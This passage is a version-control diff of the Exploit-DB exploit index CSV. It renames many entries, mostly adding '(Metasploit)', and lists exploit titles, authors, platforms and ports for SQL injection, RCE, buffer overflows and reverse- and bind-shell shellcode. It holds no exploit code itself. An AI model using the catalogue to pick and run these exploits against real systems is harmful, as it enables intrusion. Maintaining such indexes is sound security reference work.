XSS",2008-04-14,"Juan de la Fuente Costa",asp,webapps,0 @@ -29342,7 +29342,7 @@ id,file,description,date,author,platform,type,port 32565,platforms/multiple/remote/32565.txt,"Struts <= 2.0.11 - Multiple Directory Traversal Vulnerabilities",2008-11-04,"Csaba Barta",multiple,remote,0 32566,platforms/php/webapps/32566.txt,"firmCHANNEL Indoor & Outdoor Digital Signage 3.24 - Cross-Site Scripting",2008-11-04,"Brad Antoniewicz",php,webapps,0 32567,platforms/php/webapps/32567.txt,"DHCart 3.84 - Multiple Cross-Site Scripting And HTML Injection Vulnerabilities",2008-11-04,Lostmon,php,webapps,0 -32568,platforms/windows/remote/32568.rb,"Fitnesse Wiki - Remote Command Execution",2014-03-28,"SecPod Research",windows,remote,80 +32568,platforms/windows/remote/32568.rb,"Fitnesse Wiki - Remote Command Execution (Metasploit)",2014-03-28,"SecPod Research",windows,remote,80 32569,platforms/ios/webapps/32569.txt,"iStArtApp FileXChange 6.2 iOS - Multiple Vulnerabilities",2014-03-28,Vulnerability-Lab,ios,webapps,8888 32570,platforms/php/webapps/32570.txt,"CuteNews aj-fork 'path' Parameter Remote File Include",2008-11-06,DeltahackingTEAM,php,webapps,0 32571,platforms/php/webapps/32571.txt,"TurnkeyForms Software Directory 1.0 SQL Injection and Cross-Site Scripting Vulnerabilities",2008-11-07,G4N0K,php,webapps,0 @@ -29396,7 +29396,7 @@ id,file,description,date,author,platform,type,port 32619,platforms/ios/webapps/32619.txt,"PhotoWIFI Lite 1.0 iOS - Multiple Vulnerabilities",2014-03-31,Vulnerability-Lab,ios,webapps,52789 32620,platforms/ios/webapps/32620.txt,"Vanctech File Commander 1.1 iOS - Multiple Vulnerabilities",2014-03-31,Vulnerability-Lab,ios,webapps,8080 32622,platforms/php/webapps/32622.txt,"WordPress Ajax Pagination Plugin 1.1 - Local File Inclusion",2014-03-31,"Glyn Wintle",php,webapps,80 -32623,platforms/multiple/webapps/32623.txt,"EMC Cloud Tiering Appliance 10.0 - Unauthenticated XXE Arbitrary File Read",2014-03-31,"Brandon Perry",multiple,webapps,0 +32623,platforms/multiple/webapps/32623.txt,"EMC Cloud Tiering Appliance 10.0 - Unauthenticated XXE Arbitrary File Read (Metasploit)",2014-03-31,"Brandon Perry",multiple,webapps,0 32624,platforms/php/webapps/32624.txt,"PHP JOBWEBSITE PRO siteadmin/forgot.php adname Parameter SQL Injection",2008-12-01,Pouya_Server,php,webapps,0 32625,platforms/php/webapps/32625.txt,"PHP JOBWEBSITE PRO siteadmin/forgot.php Multiple Parameter XSS",2008-12-01,Pouya_Server,php,webapps,0 32626,platforms/asp/webapps/32626.txt,"ASP Forum Script messages.asp message_id Parameter SQL Injection",2008-12-01,Pouya_Server,asp,webapps,0 @@ -29417,7 +29417,7 @@ id,file,description,date,author,platform,type,port 32641,platforms/php/webapps/32641.txt,"RevSense 1.0 SQL Injection and Cross-Site Scripting Vulnerabilities",2008-12-04,Pouya_Server,php,webapps,0 32642,platforms/php/webapps/32642.txt,"PHPSTREET Webboard 1.0 - 'show.php' SQL Injection",2008-12-04,"CWH Underground",php,webapps,0 32643,platforms/windows/remote/32643.txt,"PhonerLite 2.14 SIP Soft Phone - SIP Digest Disclosure",2014-04-01,"Jason Ostrom",windows,remote,5060 -32644,platforms/php/webapps/32644.txt,"AlienVault 4.5.0 - Authenticated SQL Injection",2014-04-01,"Brandon Perry",php,webapps,443 +32644,platforms/php/webapps/32644.txt,"AlienVault 4.5.0 - Authenticated SQL Injection (Metasploit)",2014-04-01,"Brandon Perry",php,webapps,443 32645,platforms/php/webapps/32645.txt,"TWiki 4.x SEARCH Variable Remote Command Execution",2008-12-06,"Troy Bollinge",php,webapps,0 32646,platforms/php/webapps/32646.txt,"TWiki 4.x URLPARAM Variable Cross-Site Scripting",2008-12-06,"Marc Schoenefeld",php,webapps,0 32647,platforms/php/webapps/32647.txt,"PrestaShop 1.1 admin/login.php PATH_INFO Parameter XSS",2008-12-08,th3.r00k.ieatpork,php,webapps,0 @@ -29648,7 +29648,7 @@ id,file,description,date,author,platform,type,port 32882,platforms/asp/webapps/32882.txt,"SAP Business Objects Crystal Reports 7-10 - 'viewreport.asp' Cross-Site Scripting",2009-04-02,"Bugs NotHugs",asp,webapps,0 32883,platforms/hardware/webapps/32883.txt,"NETGEAR N600 WIRELESS DUAL BAND WNDR3400 - Multiple Vulnerabilities",2014-04-15,"Santhosh Kumar",hardware,webapps,8080 32884,platforms/android/local/32884.txt,"Adobe Reader for Android 11.1.3 - Arbitrary JavaScript Execution",2014-04-15,"Yorick Koster",android,local,0 -32885,platforms/unix/remote/32885.rb,"Unitrends Enterprise Backup 7.3.0 - Unauthenticated Root RCE",2014-04-15,"Brandon Perry",unix,remote,443 +32885,platforms/unix/remote/32885.rb,"Unitrends Enterprise Backup 7.3.0 - Unauthenticated Root RCE (Metasploit)",2014-04-15,"Brandon Perry",unix,remote,443 32886,platforms/hardware/webapps/32886.txt,"Xerox DocuShare - SQL Injection",2014-04-15,"Brandon Perry",hardware,webapps,8080 32888,platforms/asp/webapps/32888.txt,"Asbru Web Content Management 6.5/6.6.9 SQL Injection and Cross-Site Scripting Vulnerabilities",2009-04-02,"Patrick Webster",asp,webapps,0 32889,platforms/php/webapps/32889.txt,"4CMS - SQL Injection and Local File Include Vulnerabilities",2009-04-02,k1ll3r_null,php,webapps,0 @@ -29899,7 +29899,7 @@ id,file,description,date,author,platform,type,port 33138,platforms/hardware/webapps/33138.txt,"NETGEAR DGN2200 1.0.0.29_1.7.29_HotS - Stored XSS",2014-05-01,"Dolev Farhi",hardware,webapps,0 33584,platforms/multiple/dos/33584.txt,"IBM DB2 - 'kuddb2' Remote Denial of Service",2010-01-31,"Evgeny Legerov",multiple,dos,0 33142,platforms/multiple/remote/33142.rb,"Apache Struts ClassLoader Manipulation Remote Code Execution",2014-05-02,Metasploit,multiple,remote,8080 -33143,platforms/hardware/remote/33143.rb,"F5 BIG-IQ 4.1.0.2013.0 - Privilege Escalation",2014-05-02,"Brandon Perry",hardware,remote,443 +33143,platforms/hardware/remote/33143.rb,"F5 BIG-IQ 4.1.0.2013.0 - Privilege Escalation (Metasploit)",2014-05-02,"Brandon Perry",hardware,remote,443 33144,platforms/php/webapps/33144.txt,"Censura < 2.1.1 - Multiple Cross-Site Scripting Vulnerabilities",2009-06-29,mark99,php,webapps,0 33145,platforms/linux/local/33145.c,"PHP Fuzzer Framework Default Location Insecure Temporary File Creation",2009-08-03,"Melissa Elliott",linux,local,0 33146,platforms/php/webapps/33146.txt,"CS-Cart 2.0.5 - 'reward_points.post.php' SQL Injection",2009-08-04,"Ryan Dewhurst",php,webapps,0 @@ -30032,7 +30032,7 @@ id,file,description,date,author,platform,type,port 33282,platforms/php/webapps/33282.txt,"Dream Poll 3.1 - 'index.php' Cross-Site Scripting and SQL Injection Vulnerabilities",2009-10-13,infosecstuff,php,webapps,0 33283,platforms/linux/dos/33283.txt,"Adobe Reader <= 9.1.3 and Acrobat COM Objects Memory Corruption Remote Code Execution",2009-10-13,Skylined,linux,dos,0 33284,platforms/multiple/webapps/33284.txt,"Pentaho BI 1.x - Multiple Cross-Site Scripting and Information Disclosure Vulnerabilities",2009-10-14,euronymous,multiple,webapps,0 -33317,platforms/php/webapps/33317.txt,"AlienVault OSSIM 4.6.1 - Authenticated SQL Injection",2014-05-12,"Chris Hebert",php,webapps,443 +33317,platforms/php/webapps/33317.txt,"AlienVault OSSIM 4.6.1 - Authenticated SQL Injection (Metasploit)",2014-05-12,"Chris Hebert",php,webapps,443 33286,platforms/java/webapps/33286.txt,"Eclipse BIRT 2.2.1 - 'run?__report' Parameter Cross-Site Scripting",2009-10-14,"Michele Orru",java,webapps,0 33287,platforms/php/webapps/33287.txt,"bloofoxCMS 0.3.5 - 'search' Parameter Cross-Site Scripting",2009-10-15,"drunken danish rednecks",php,webapps,0 33288,platforms/php/webapps/33288.txt,"Zainu 1.0 - 'searchSongKeyword' Parameter Cross-Site Scripting",2009-10-14,"drunken danish rednecks",php,webapps,0 @@ -30754,7 +30754,7 @@ id,file,description,date,author,platform,type,port 34111,platforms/multiple/webapps/34111.txt,"GREEZLE - Global Real Estate Agent Login Multiple SQL Injection Vulnerabilities",2010-06-09,"L0rd CrusAd3r",multiple,webapps,0 34339,platforms/php/webapps/34339.txt,"Pligg 1.0.4 - 'search.php' Cross-Site Scripting",2010-07-15,"High-Tech Bridge SA",php,webapps,0 34124,platforms/php/webapps/34124.txt,"WordPress WP BackupPlus - Database And Files Backup Download (0Day)",2014-07-20,pSyCh0_3D,php,webapps,0 -34130,platforms/linux/webapps/34130.rb,"Raritan PowerIQ 4.1.0 - SQL Injection",2014-07-21,"Brandon Perry",linux,webapps,80 +34130,platforms/linux/webapps/34130.rb,"Raritan PowerIQ 4.1.0 - SQL Injection (Metasploit)",2014-07-21,"Brandon Perry",linux,webapps,80 34126,platforms/windows/remote/34126.txt,"Microsoft Help and Support Center 'sysinfo/sysinfomain.htm' Cross-Site Scripting Weakness",2010-06-10,"Tavis Ormandy",windows,remote,0 34127,platforms/php/webapps/34127.txt,"Arab Portal 2.2 - 'members.php' SQL Injection",2010-06-10,SwEET-DeViL,php,webapps,0 34128,platforms/hardware/webapps/34128.py,"MTS MBlaze Ultra Wi-Fi / ZTE AC3633 - Multiple Vulnerabilities",2014-07-21,"Ajin Abraham",hardware,webapps,80 @@ -30957,7 +30957,7 @@ id,file,description,date,author,platform,type,port 34365,platforms/php/webapps/34365.txt,"Claus Muus Spitfire 1.0.336 - Multiple Cross-Site Scripting Vulnerabilities",2010-07-22,"High-Tech Bridge SA",php,webapps,0 34366,platforms/php/webapps/34366.txt,"Stratek Web Design Twilight CMS 4.0 - 'calendar' Cross-Site Scripting",2009-11-02,"Vladimir Vorontsov",php,webapps,0 34367,platforms/php/webapps/34367.txt,"Piwigo 2.0 - 'comments.php' Multiple Cross-Site Scripting Vulnerabilities",2009-10-28,"Andrew Paterson",php,webapps,0 -34368,platforms/windows/dos/34368.c,"Mthree Development MP3 to WAV Decoder - (.mp3 File) Remote Buffer Overflow",2009-10-31,4m!n,windows,dos,0 +34368,platforms/windows/dos/34368.c,"Mthree Development MP3 to WAV Decoder - (.mp3) Remote Buffer Overflow",2009-10-31,4m!n,windows,dos,0 34369,platforms/multiple/remote/34369.txt,"IBM Java UTF8 Byte Sequences Security Bypass",2010-07-23,IBM,multiple,remote,0 34370,platforms/jsp/webapps/34370.txt,"SAP Netweaver 6.4/7.0 - 'wsnavigator' Cross-Site Scripting",2010-07-23,"Alexandr Polyakov",jsp,webapps,0 34372,platforms/multiple/remote/34372.txt,"PacketVideo Twonky Server 4.4.17/5.0.65 - Cross-Site Scripting and HTML Injection Vulnerabilities",2009-11-01,"Davide Canali",multiple,remote,0 @@ -30997,7 +30997,7 @@ id,file,description,date,author,platform,type,port 34404,platforms/windows/dos/34404.pl,"K-Meleon 1.x URI Handling Multiple Denial of Service Vulnerabilities",2010-08-04,Lostmon,windows,dos,0 34405,platforms/php/webapps/34405.txt,"PHP Stock Management System 1.02 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2014-08-25,"Ragha Deepthi K R",php,webapps,0 34408,platforms/multiple/webapps/34408.txt,"Innovaphone PBX Admin-GUI - CSRF",2014-08-25,"Rainer Giedat",multiple,webapps,80 -34409,platforms/multiple/webapps/34409.rb,"ManageEngine Password Manager MetadataServlet.dat SQL Injection",2014-08-25,"Pedro Ribeiro",multiple,webapps,8020 +34409,platforms/multiple/webapps/34409.rb,"ManageEngine Password Manager MetadataServlet.dat SQL Injection (Metasploit)",2014-08-25,"Pedro Ribeiro",multiple,webapps,8020 34410,platforms/php/webapps/34410.txt,"PHPFinance 0.6 - 'group.php' SQL Injection and HTML Injection Vulnerabilities",2010-08-05,skskilL,php,webapps,0 34411,platforms/asp/webapps/34411.txt,"DT Centrepiece 4.5 - Cross-Site Scripting and Security Bypass Vulnerabilities",2010-08-05,"High-Tech Bridge SA",asp,webapps,0 34412,platforms/php/webapps/34412.txt,"Hulihan Applications BXR 0.6.8 SQL Injection and HTML Injection Vulnerabilities",2010-08-05,"High-Tech Bridge SA",php,webapps,0 @@ -31204,7 +31204,7 @@ id,file,description,date,author,platform,type,port 34644,platforms/php/webapps/34644.txt,"Silurus Classifieds wcategory.php ID Parameter XSS",2009-08-06,Moudi,php,webapps,0 34645,platforms/php/webapps/34645.txt,"Silurus Classifieds search.php keywords Parameter XSS",2009-08-06,Moudi,php,webapps,0 34646,platforms/php/webapps/34646.txt,"Blog Ink (Blink) - Multiple SQL Injection Vulnerabilities",2009-08-03,Drosophila,php,webapps,0 -34647,platforms/windows/remote/34647.txt,"Ammyy Admin 3.5 - RCE",2014-09-13,scriptjunkie,windows,remote,0 +34647,platforms/windows/remote/34647.txt,"Ammyy Admin 3.5 - RCE (Metasploit)",2014-09-13,scriptjunkie,windows,remote,0 34648,platforms/windows/local/34648.txt,"Comodo Internet Security - HIPS/Sandbox Escape PoC",2014-09-13,"Joxean Koret",windows,local,0 34649,platforms/php/webapps/34649.txt,"Netautor Professional 5.5 - 'login2.php' Cross-Site Scripting",2010-09-17,"Gjoko Krstic",php,webapps,0 34650,platforms/php/webapps/34650.txt,"e-Soft24 Flash Games Script 1.0 - Cross-Site Scripting",2009-08-30,"599eme Man",php,webapps,0 @@ -31361,7 +31361,7 @@ id,file,description,date,author,platform,type,port 34814,platforms/php/webapps/34814.txt,"SquirrelMail Virtual Keyboard Plugin 'vkeyboard.php' Cross-Site Scripting",2010-10-05,"Moritz Naumann",php,webapps,0 34815,platforms/windows/remote/34815.html,"Microsoft Internet Explorer 8 - Fixed Col Span ID Full ASLR + DEP + EMET 5.0 Bypass (MS12-037)",2014-09-29,"ryujin & sickness",windows,remote,0 34820,platforms/php/webapps/34820.pl,"Joomla Club Manager Component - 'cm_id' Parameter SQL Injection",2010-10-06,FL0RiX,php,webapps,0 -34817,platforms/windows/webapps/34817.rb,"Microsoft Exchange IIS HTTP Internal IP Address Disclosure",2014-09-29,"Nate Power",windows,webapps,0 +34817,platforms/windows/webapps/34817.rb,"Microsoft Exchange IIS HTTP Internal IP Address Disclosure (Metasploit)",2014-09-29,"Nate Power",windows,webapps,0 34818,platforms/php/webapps/34818.html,"OpenFiler 2.99.1 - CSRF",2014-09-29,"Dolev Farhi",php,webapps,446 34975,platforms/php/webapps/34975.txt,"SEO Tools Plugin for WordPress 3.0 - 'file' Parameter Directory Traversal",2010-11-08,"John Leitch",php,webapps,0 34976,platforms/php/webapps/34976.txt,"Vodpod Video Gallery 3.1.5 for WordPress - 'vodpod_gallery_thumbs.php' Cross-Site Scripting",2010-11-08,"John Leitch",php,webapps,0 @@ -31405,7 +31405,7 @@ id,file,description,date,author,platform,type,port 34864,platforms/asp/webapps/34864.txt,"Epicor Enterprise 7.4 - Multiple Vulnerabilities",2014-10-02,"Fara Rustein",asp,webapps,443 34865,platforms/multiple/webapps/34865.txt,"Moab < 7.2.9 - Authorization Bypass",2014-10-02,"MWR InfoSecurity",multiple,webapps,0 34866,platforms/linux/remote/34866.rb,"HP Network Node Manager I PMD Buffer Overflow",2014-10-02,Metasploit,linux,remote,7426 -34867,platforms/java/remote/34867.rb,"ManageEngine OpManager / Social IT Arbitrary File Upload",2014-10-02,"Pedro Ribeiro",java,remote,80 +34867,platforms/java/remote/34867.rb,"ManageEngine OpManager / Social IT Arbitrary File Upload (Metasploit)",2014-10-02,"Pedro Ribeiro",java,remote,80 34868,platforms/windows/remote/34868.c,"Phoenix Project Manager 2.1.0.8 DLL Loading Arbitrary Code Execution",2010-10-19,anT!-Tr0J4n,windows,remote,0 34869,platforms/windows/remote/34869.c,"Cool iPhone Ringtone Maker 2.2.3 - 'dwmapi.dll' DLL Loading Arbitrary Code Execution",2010-10-19,anT!-Tr0J4n,windows,remote,0 34870,platforms/windows/remote/34870.html,"VLC Media Player 1.1.4 Mozilla Multimedia Plugin - Remote Code Execution",2010-10-19,shinnai,windows,remote,0 @@ -31558,7 +31558,7 @@ id,file,description,date,author,platform,type,port 35036,platforms/php/webapps/35036.txt,"Annuaire Component for Joomla! 'id' Parameter SQL Injection",2010-12-02,"Ashiyane Digital Security Team",php,webapps,0 35037,platforms/ios/webapps/35037.txt,"iFunBox Free 1.1 iOS - File Inclusion",2014-10-22,Vulnerability-Lab,ios,webapps,8000 35038,platforms/ios/webapps/35038.txt,"File Manager 4.2.10 iOS - Code Execution",2014-10-22,Vulnerability-Lab,ios,webapps,80 -35039,platforms/windows/webapps/35039.rb,"DotNetNuke DNNspot Store 3.0.0 - Arbitrary File Upload",2014-10-22,"Glafkos Charalambous ",windows,webapps,0 +35039,platforms/windows/webapps/35039.rb,"DotNetNuke DNNspot Store 3.0.0 - Arbitrary File Upload (Metasploit)",2014-10-22,"Glafkos Charalambous ",windows,webapps,0 35040,platforms/windows/local/35040.txt,"iBackup 10.0.0.32 - Local Privilege Escalation",2014-10-22,"Glafkos Charalambous ",windows,local,0 35041,platforms/php/webapps/35041.py,"Feng Office 1.7.4 - Arbitrary File Upload",2014-10-23,"AutoSec Tools",php,webapps,0 35042,platforms/php/webapps/35042.txt,"Feng Office 1.7.4 - Cross-Site Scripting Vulnerabilities",2014-10-23,"AutoSec Tools",php,webapps,0 @@ -31878,8 +31878,8 @@ id,file,description,date,author,platform,type,port 35378,platforms/php/webapps/35378.txt,"WordPress DB Backup Plugin - Arbitrary File Download",2014-11-26,"Ashiyane Digital Security Team",php,webapps,80 35379,platforms/windows/dos/35379.go,"Elipse E3 - HTTP Denial of Service",2014-11-26,firebitsbr,windows,dos,80 35382,platforms/android/dos/35382.txt,"Android WAPPushManager - SQL Injection",2014-11-26,"Baidu X-Team",android,dos,0 -35383,platforms/cgi/webapps/35383.rb,"Device42 WAN Emulator 2.3 - Traceroute Command Injection",2014-11-26,"Brandon Perry",cgi,webapps,80 -35384,platforms/cgi/webapps/35384.rb,"Device42 WAN Emulator 2.3 - Ping Command Injection",2014-11-26,"Brandon Perry",cgi,webapps,80 +35383,platforms/cgi/webapps/35383.rb,"Device42 WAN Emulator 2.3 - Traceroute Command Injection (Metasploit)",2014-11-26,"Brandon Perry",cgi,webapps,80 +35384,platforms/cgi/webapps/35384.rb,"Device42 WAN Emulator 2.3 - Ping Command Injection (Metasploit)",2014-11-26,"Brandon Perry",cgi,webapps,80 35385,platforms/php/webapps/35385.pl,"WordPress Plugin Slider Revolution 3.0.95 /Showbiz Pro 1.7.1 - Shell Upload Exploit",2014-11-26,"Simo Ben Youssef",php,webapps,80 35386,platforms/linux/remote/35386.txt,"Logwatch Log File - Special Characters Local Privilege Escalation",2011-02-24,"Dominik George",linux,remote,0 35387,platforms/php/webapps/35387.txt,"phpShop 0.8.1 - 'page' Parameter Cross-Site Scripting",2011-02-25,"Aung Khant",php,webapps,0 @@ -32042,7 +32042,7 @@ id,file,description,date,author,platform,type,port 35550,platforms/php/webapps/35550.txt,"Collabtive 0.6.5 - Multiple Remote Input Validation Vulnerabilities",2011-03-31,"High-Tech Bridge SA",php,webapps,0 35551,platforms/php/webapps/35551.txt,"CMS Papoo 6.0.0 Rev. 4701 - Stored XSS",2014-12-16,"Steffen Rösemann",php,webapps,80 35552,platforms/windows/dos/35552.py,"MoviePlay 4.82 - (.avi) Buffer Overflow",2011-03-31,^Xecuti0N3r,windows,dos,0 -35553,platforms/windows/dos/35553.pl,"Microsoft Windows Media Player 11.0.5721.5145 - (.avi File) Buffer Overflow",2011-03-31,^Xecuti0N3r,windows,dos,0 +35553,platforms/windows/dos/35553.pl,"Microsoft Windows Media Player 11.0.5721.5145 - (.avi) Buffer Overflow",2011-03-31,^Xecuti0N3r,windows,dos,0 35554,platforms/linux/remote/35554.txt,"Perl 5.x - 'lc()' and 'uc()' Functions TAINT Mode Protection Security Bypass Weakness",2011-03-30,mmartinec,linux,remote,0 35555,platforms/php/webapps/35555.txt,"AWCM 2.x - 'search.php' Cross-Site Scripting",2011-04-01,"Antu Sanadi",php,webapps,0 35569,platforms/php/webapps/35569.txt,"XOOPS 2.5 - 'banners.php' Multiple Local File Include Vulnerabilities",2011-04-04,KedAns-Dz,php,webapps,0 @@ -32057,14 +32057,14 @@ id,file,description,date,author,platform,type,port 35578,platforms/php/webapps/35578.sh,"Cacti Superlinks Plugin 1.4-2 - RCE (LFI) via SQL Injection Exploit",2014-12-19,Wireghoul,php,webapps,0 35579,platforms/php/webapps/35579.txt,"miniBB 3.1 - Blind SQL Injection",2014-12-19,"Kacper Szurek",php,webapps,80 35580,platforms/linux/dos/35580.rb,"Ettercap 0.8.0-0.8.1 - Multiple Denial of Service Vulnerabilities",2014-12-19,"Nick Sampanis",linux,dos,0 -35581,platforms/linux/remote/35581.rb,"Varnish Cache CLI Interface - Remote Code Execution",2014-12-19,"Patrick Webster",linux,remote,6082 +35581,platforms/linux/remote/35581.rb,"Varnish Cache CLI Interface - Remote Code Execution (Metasploit)",2014-12-19,"Patrick Webster",linux,remote,6082 35582,platforms/php/webapps/35582.txt,"ProjectSend r561 - Multiple Vulnerabilities",2014-12-19,TaurusOmar,php,webapps,80 35583,platforms/php/webapps/35583.txt,"Piwigo 2.7.2 - Multiple Vulnerabilities",2014-12-19,TaurusOmar,php,webapps,80 35584,platforms/php/webapps/35584.txt,"GQ File Manager 0.2.5 - Multiple Vulnerabilities",2014-12-19,TaurusOmar,php,webapps,80 35586,platforms/lin_x86-64/shellcode/35586.c,"Linux/x86-64 - Bind 4444/TCP Port Shellcode (81 bytes / 96 bytes with password)",2014-12-22,"Sean Dillon",lin_x86-64,shellcode,0 35585,platforms/php/webapps/35585.txt,"Codiad 2.4.3 - Multiple Vulnerabilities",2014-12-19,TaurusOmar,php,webapps,80 35587,platforms/lin_x86-64/shellcode/35587.c,"Linux/x86-64 - Reverse TCP connect shellcode (77 to 85 bytes / 90 to 98 bytes with password)",2014-12-22,"Sean Dillon",lin_x86-64,shellcode,0 -35588,platforms/php/remote/35588.rb,"Lotus Mail Encryption Server (Protector for Mail) - LFI to RCE",2014-12-22,"Patrick Webster",php,remote,9000 +35588,platforms/php/remote/35588.rb,"Lotus Mail Encryption Server (Protector for Mail) - LFI to RCE (Metasploit)",2014-12-22,"Patrick Webster",php,remote,9000 35589,platforms/windows/dos/35589.py,"NotePad++ 6.6.9 - Buffer Overflow",2014-12-22,TaurusOmar,windows,dos,0 35590,platforms/windows/local/35590.txt,"BitRaider Streaming Client 1.3.3.4098 - Local Privilege Escalation",2014-12-23,LiquidWorm,windows,local,0 35591,platforms/php/webapps/35591.txt,"phpMyRecipes 1.2.2 - (browse.php category param) SQL injection",2014-12-23,"Manish Tanwar",php,webapps,80 @@ -32152,7 +32152,7 @@ id,file,description,date,author,platform,type,port 35683,platforms/java/webapps/35683.txt,"LANSA aXes Web Terminal TN5250 - 'axes_default.css' Cross Site Scripting",2011-05-02,"Patrick Webster",java,webapps,0 35684,platforms/php/webapps/35684.txt,"LDAP Account Manager 3.4.0 selfserviceSaveOk Parameter Cross Site Scripting",2011-05-02,"AutoSec Tools",php,webapps,0 35685,platforms/multiple/remote/35685.txt,"Asterisk 1.8.x SIP INVITE Request User Enumeration Weakness",2011-05-02,"Francesco Tornieri",multiple,remote,0 -35686,platforms/windows/remote/35686.pl,"OpenMyZip 0.1 - (.zip File) Buffer Overflow",2011-05-02,"C4SS!0 G0M3S",windows,remote,0 +35686,platforms/windows/remote/35686.pl,"OpenMyZip 0.1 - (.zip) Buffer Overflow",2011-05-02,"C4SS!0 G0M3S",windows,remote,0 35688,platforms/hardware/remote/35688.py,"ASUSWRT 3.0.0.4.376_1071 - LAN Backdoor Command Execution",2015-01-04,"Friedrich Postelstorfer",hardware,remote,0 35699,platforms/php/webapps/35699.txt,"E2 Photo Gallery 0.9 - 'index.php' Cross Site Scripting",2011-05-03,"High-Tech Bridge SA",php,webapps,0 35700,platforms/php/webapps/35700.txt,"YaPIG 0.95 Multiple Cross Site Scripting Vulnerabilities",2011-05-03,"High-Tech Bridge SA",php,webapps,0 @@ -32639,7 +32639,7 @@ id,file,description,date,author,platform,type,port 36203,platforms/php/webapps/36203.txt,"vtiger CRM 5.2.1 index.php Multiple Parameter XSS",2011-10-04,"Aung Khant",php,webapps,0 36204,platforms/php/webapps/36204.txt,"vtiger CRM 5.2.1 phprint.php Multiple Parameter XSS",2011-10-04,"Aung Khant",php,webapps,0 36205,platforms/hardware/remote/36205.txt,"SonicWALL SessId Cookie Brute-force Weakness Admin Session Hijacking",2011-10-04,"Hugo Vazquez",hardware,remote,0 -36206,platforms/windows/remote/36206.rb,"Persistent Systems Client Automation - Command Injection RCE",2015-02-27,"Ben Turner",windows,remote,3465 +36206,platforms/windows/remote/36206.rb,"Persistent Systems Client Automation - Command Injection RCE (Metasploit)",2015-02-27,"Ben Turner",windows,remote,3465 36207,platforms/windows/local/36207.py,"Microsoft Office Word 2007 - RTF Object Confusion (ASLR and DEP Bypass)",2015-02-28,R-73eN,windows,local,0 36208,platforms/php/webapps/36208.txt,"vtiger CRM 5.2 - 'onlyforuser' Parameter SQL Injection",2011-10-15,"Aung Khant",php,webapps,0 36209,platforms/windows/remote/36209.html,"Microsoft Internet Explorer 8 - Select Element Memory Corruption",2011-10-11,"Ivan Fratric",windows,remote,0 @@ -32845,9 +32845,9 @@ id,file,description,date,author,platform,type,port 36486,platforms/php/webapps/36486.txt,"Tienda Virtual 'art_detalle.php' SQL Injection",2012-01-03,"Arturo Zamora",php,webapps,0 36417,platforms/windows/local/36417.txt,"Spybot Search & Destroy 1.6.2 Security Center Service - Privilege Escalation",2015-03-17,LiquidWorm,windows,local,0 36418,platforms/php/webapps/36418.txt,"Moodle 2.5.9/2.6.8/2.7.5/2.8.3 - Block Title Handler Cross-Site Scripting",2015-03-17,LiquidWorm,php,webapps,0 -36419,platforms/multiple/webapps/36419.txt,"Metasploit Project < 4.11.1 - Initial User Creation CSRF",2015-03-17,"Mohamed Abdelbaset Elnoby",multiple,webapps,3790 +36419,platforms/multiple/webapps/36419.txt,"Metasploit Project < 4.11.1 - Initial User Creation CSRF (Metasploit)",2015-03-17,"Mohamed Abdelbaset Elnoby",multiple,webapps,3790 36420,platforms/windows/remote/36420.rb,"Adobe Flash Player PCRE Regex",2015-03-17,Metasploit,windows,remote,0 -36421,platforms/linux/remote/36421.rb,"Exim GHOST (glibc gethostbyname) Buffer Overflow",2015-03-18,"Qualys Corporation",linux,remote,25 +36421,platforms/linux/remote/36421.rb,"Exim GHOST (glibc gethostbyname) Buffer Overflow (Metasploit)",2015-03-18,"Qualys Corporation",linux,remote,25 36783,platforms/windows/dos/36783.txt,"Oracle Hyperion Smart View for Office 11.1.2.3.000 - Crash PoC",2015-04-17,sajith,windows,dos,0 36480,platforms/multiple/remote/36480.rb,"Firefox Proxy Prototype Privileged Javascript Injection",2015-03-24,Metasploit,multiple,remote,0 36422,platforms/windows/dos/36422.txt,"Fortinet Single Sign On - Stack Overflow",2015-03-18,"Core Security",windows,dos,8000 @@ -32923,8 +32923,8 @@ id,file,description,date,author,platform,type,port 36500,platforms/windows/remote/36500.txt,"HServer 0.1.1 Directory Traversal",2012-01-05,demonalex,windows,remote,0 36501,platforms/windows/local/36501.py,"Mini-stream Ripper 2.7.7.100 - Local Buffer Overflow",2015-03-26,"TUNISIAN CYBER",windows,local,0 36502,platforms/windows/local/36502.py,"RM Downloader 2.7.5.400 - Local Buffer Overflow",2015-03-26,"TUNISIAN CYBER",windows,local,0 -36503,platforms/hardware/remote/36503.rb,"QNAP - Admin Shell via Bash Environment Variable Code Injection",2015-03-26,"Patrick Pellegrino",hardware,remote,9993 -36504,platforms/hardware/remote/36504.rb,"QNAP - Web Server Remote Code Execution via Bash Environment Variable Code Injection",2015-03-26,"Patrick Pellegrino",hardware,remote,0 +36503,platforms/hardware/remote/36503.rb,"QNAP - Admin Shell via Bash Environment Variable Code Injection (Metasploit)",2015-03-26,"Patrick Pellegrino",hardware,remote,9993 +36504,platforms/hardware/remote/36504.rb,"QNAP - Web Server Remote Code Execution via Bash Environment Variable Code Injection (Metasploit)",2015-03-26,"Patrick Pellegrino",hardware,remote,0 36505,platforms/windows/remote/36505.txt,"WebGate eDVR Manager - Stack Buffer Overflow",2015-03-26,"Praveen Darshanam",windows,remote,0 36507,platforms/windows/remote/36507.txt,"Microsoft AntiXSS 3/4.0 Library Sanitization Module Security Bypass",2012-01-10,"Adi Cohen",windows,remote,0 36508,platforms/php/webapps/36508.txt,"VertrigoServ 2.25 - 'extensions.php' Script Cross Site Scripting",2012-01-05,"Stefan Schurtz",php,webapps,0 @@ -33015,7 +33015,7 @@ id,file,description,date,author,platform,type,port 36597,platforms/php/webapps/36597.txt,"Joomla! 'com_bulkenquery' Component 'controller' Parameter Local File Include",2012-01-21,the_cyber_nuxbie,php,webapps,0 36598,platforms/php/webapps/36598.txt,"Joomla! 'com_kp' Component 'controller' Parameter Local File Include",2012-01-21,the_cyber_nuxbie,php,webapps,0 36599,platforms/asp/webapps/36599.txt,"Raven 1.0 - 'connector.asp' Arbitrary File Upload",2012-01-21,HELLBOY,asp,webapps,0 -36600,platforms/php/webapps/36600.txt,"WordPress Business Intelligence Plugin - SQL injection",2015-04-02,"Jagriti Sahu",php,webapps,80 +36600,platforms/php/webapps/36600.txt,"WordPress Business Intelligence Plugin - SQL injection (Metasploit)",2015-04-02,"Jagriti Sahu",php,webapps,80 36601,platforms/php/webapps/36601.txt,"Joomla Spider Random Article Component - SQL Injection",2015-04-02,"Jagriti Sahu",php,webapps,80 36620,platforms/php/webapps/36620.txt,"WordPress YouSayToo auto-publishing Plugin 1.0 - 'submit' Parameter Cross Site Scripting",2012-01-24,"H4ckCity Security Team",php,webapps,0 36602,platforms/windows/remote/36602.html,"Webgate 